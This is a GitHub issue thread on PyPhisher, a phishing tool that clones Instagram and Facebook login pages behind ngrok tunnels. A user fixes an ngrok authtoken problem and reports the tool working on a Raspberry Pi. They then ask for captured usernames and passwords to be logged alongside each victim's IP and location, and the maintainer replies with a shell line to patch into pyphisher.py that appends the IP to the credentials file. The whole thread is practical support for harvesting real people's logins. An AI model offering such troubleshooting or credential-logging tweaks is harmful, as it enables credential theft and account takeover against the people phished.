### ISSUE TITLE
ERR_NGROK_6022

### ISSUE THREAD

**Issue by Darkeyes-web** [KasRoudra/PyPhisher#58]
hello, 

first of all thank you for the very nice project!
i tried to test it, but the url generated are not working.. 
i got this error : 
**_Before you can serve HTML content, you must [sign up for a free ngrok account](https://dashboard.ngrok.com/signup) and install your [authtoken](https://dashboard.ngrok.com/get-started/your-authtoken)_**

![Screenshot 2022-05-18 231707](https://user-images.githubusercontent.com/96911681/169157307-38fb29e7-951d-4fe4-9d8e-e7e05809b452.jpg)

it seams that ngrok does not work.
an idea why or a workaround?
it tried instagram and facebook template, customized and auto generated urls..both are not working.

**Comment by KasRoudra** [comment]
@Darkeyes-web You have to signup in ngrok"s website and then use your authtoken in order to use ngrok. You can get full instructions [here](#1)

**Comment by Darkeyes-web** [comment]
thank you for the response.

i did made an account and copied the authtoken and added it.

![ngrok](https://user-images.githubusercontent.com/96911681/169309347-215933fe-c173-409f-8c90-7a439e96dd3b.jpg)

after starting pyphisher.py i receive this problem:
![Tunneling](https://user-images.githubusercontent.com/96911681/169308373-73abdca5-79a6-4298-8c55-fbb128ea5fd5.jpg)

**Comment by Darkeyes-web** [comment]
thank you very much.
everything works very fine!
am implementing it on a rasberry pi actualy.. i had to install python3.9 and some other packets. but it works great now even with customized urls..

maybe a feature request :
when the you write somthing in a generated page .. you receive this : 
![testing](https://user-images.githubusercontent.com/96911681/169312030-909c0c76-dcbc-438c-bf1c-d9ad4a83fd68.jpg)

it would be maybe much better if the IP Address and Location are also shown.. just to know which ip to wich username .. 

thank you for your help.

**Comment by KasRoudra** [comment]
@Darkeyes-web Thanks for your valuable feedback. Your satisfaction is my inspiration. But pyphisher should always show the ip adress, location, device info etc along with login info. Can you try other templates and let me know whether it shows ip or not?

**Comment by Darkeyes-web** [comment]
@KasRoudra the script is showing the ip, location and device info .. it does work there is nothing wrong with it.
what i meant is:  in the file usernames.txt it would be maybe better to show the ip adress with username and pass.
![DATA](https://user-images.githubusercontent.com/96911681/169401362-f8fe585a-dc2e-4e88-8918-a3a66cd9f25c.jpg)

its hard to find which username to which ip address.. u need to look in the other file usernames.txt and compare witch ip to witch username and if you have like 50 data so.. its hard.

maybe after the person give login information then should somthing came up in the usernames.txt file like : 

username : some name
pass  : some password
ip address : some ip ..  

so that you can directly see from which country.. specifically if you waiting for someone from a specific country..
but i will try to retrieve the data in the pyphisher.py and pass it to usernames.txt! i just thought it may help others as well.

**Comment by KasRoudra** [comment]
@Darkeyes-web The easiest way to achieve your goal is adding `system("cat $HOME/.site/ip.txt | head -n1 >> usernames.txt")` line between 601th line and 602th line of `pyphisher.py`.

#### Current:
![Screenshot_2022-05-20-05-26-29](https://user-images.githubusercontent.com/78908440/169420761-53b42c2e-5426-43e4-91d6-017382ab63e9.jpeg)

#### After changes:
![Screenshot_2022-05-20-05-26-44](https://user-images.githubusercontent.com/78908440/169420795-61c9ecfc-a2ff-41ce-97c6-b91acda17e0f.jpeg)

#### Then the `usernames.txt` will be like:
![Screenshot_2022-05-20-05-31-08](https://user-images.githubusercontent.com/78908440/169420986-e75d2910-a418-4088-a0be-583f4eb57cbc.jpeg)
